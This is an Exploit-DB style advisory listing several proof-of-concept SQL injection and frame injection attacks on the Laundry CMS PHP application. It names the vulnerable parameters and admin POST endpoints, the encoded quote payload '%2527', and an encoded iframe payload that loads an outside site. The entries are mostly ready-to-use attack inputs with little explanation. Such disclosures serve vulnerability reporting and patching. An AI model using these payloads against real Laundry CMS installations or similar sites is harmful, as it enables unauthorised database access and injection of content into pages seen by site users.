Laundry CMS - Multiple Vulnerabilities

EDB-ID:

46550

CVE:

N/A




Platform:

PHP

Date:

2019-03-15


Become a Certified Penetration Tester

Enroll in Advanced Web Attacks and Exploitation , the course required to become an Offensive Security Web Expert (OSWE)

GET CERTIFIED

===========================================================================================
# Exploit Title: Laundry CMS cloth_code SQL Inj.
# Dork: N/A
# Date: 09-03-2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: http://laundry.rpcits.co.in/
# Software Link: https://sourceforge.net/projects/laundry/
# Version: New
# Category: Webapps
# Tested on: Wamp64, Windows
# CVE: N/A
# Software Description: The Laundry Management Application is a very
simple and Online Services
  with mobile and computer friendly themes development.
===========================================================================================
# POC - SQLi
# Parameters : cloth_code, cloth_name
# Attack Pattern : %2527
# POST Method : http://localhost/laundry/index.php/admin/cloth_crud/create
===========================================================================================
###########################################################################################
===========================================================================================
# Exploit Title: Laundry CMS Multiple SQL Inj.
# Dork: N/A
# Date: 09-03-2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: http://laundry.rpcits.co.in/
# Software Link: https://sourceforge.net/projects/laundry/
# Version: New
# Category: Webapps
# Tested on: Wamp64, Windows
# CVE: N/A
# Software Description: The Laundry Management Application is a very
simple and Online Services
  with mobile and computer friendly themes development.
===========================================================================================
# POC - SQLi
# Parameters : last_name, password, email, phone, first_name, status,
join_date, address,
# Attack Pattern : %2527
# POST Method : http://localhost/laundry/index.php/admin/customer_crud/create
===========================================================================================
###########################################################################################
===========================================================================================
# Exploit Title: Laundry CMS Multiple SQL Inj.
# Dork: N/A
# Date: 09-03-2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: http://laundry.rpcits.co.in/
# Software Link: https://sourceforge.net/projects/laundry/
# Version: New
# Category: Webapps
# Tested on: Wamp64, Windows
# CVE: N/A
# Software Description: The Laundry Management Application is a very
simple and Online Services
  with mobile and computer friendly themes development.
===========================================================================================
# POC - SQLi
# Parameters : last_name, password, email, phone, first_name, status,
join_date, address, gender
# Attack Pattern : %2527
# POST Method : http://localhost/laundry/index.php/admin/employee_crud/new
===========================================================================================
###########################################################################################
===========================================================================================
# Exploit Title: Laundry CMS expse_code SQL Inj.
# Dork: N/A
# Date: 09-03-2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: http://laundry.rpcits.co.in/
# Software Link: https://sourceforge.net/projects/laundry/
# Version: New
# Category: Webapps
# Tested on: Wamp64, Windows
# CVE: N/A
# Software Description: The Laundry Management Application is a very
simple and Online Services
  with mobile and computer friendly themes development.
===========================================================================================
# POC - SQLi
# Parameters : expse_code, expse_type, expse_id
# Attack Pattern : %2527
# POST Method : http://localhost/laundry/index.php/admin/expenses_crud/create
===========================================================================================
###########################################################################################
===========================================================================================
# Exploit Title: Laundry CMS service_code SQL Inj.
# Dork: N/A
# Date: 09-03-2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: http://laundry.rpcits.co.in/
# Software Link: https://sourceforge.net/projects/laundry/
# Version: New
# Category: Webapps
# Tested on: Wamp64, Windows
# CVE: N/A
# Software Description: The Laundry Management Application is a very
simple and Online Services
  with mobile and computer friendly themes development.
===========================================================================================
# POC - SQLi
# Parameters : service_code, service_name
# Attack Pattern : %2527
# POST Method : http://localhost/laundry/index.php/admin/service_crud/create
===========================================================================================

===========================================================================================
# Exploit Title: Laundry CMS Multiple Frame Inj.
# Dork: N/A
# Date: 09-03-2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: http://laundry.rpcits.co.in/
# Software Link: https://sourceforge.net/projects/laundry/
# Version: New
# Category: Webapps
# Tested on: Wamp64, Windows
# CVE: N/A
# Software Description: The Laundry Management Application is a very simple and Online Services
  with mobile and computer friendly themes development.
===========================================================================================
# POC - Frame Inj.
# Parameters : cloth_name, service_name, expse_type
# Attack Pattern : %3ciframe+src%3d%22http%3a%2f%2fcyber-warrior.org%2f%3f%22%3e%3c%2fiframe%3e 
# POST Method : http://localhost/laundry/index.php/admin/service_crud/create  
===========================================================================================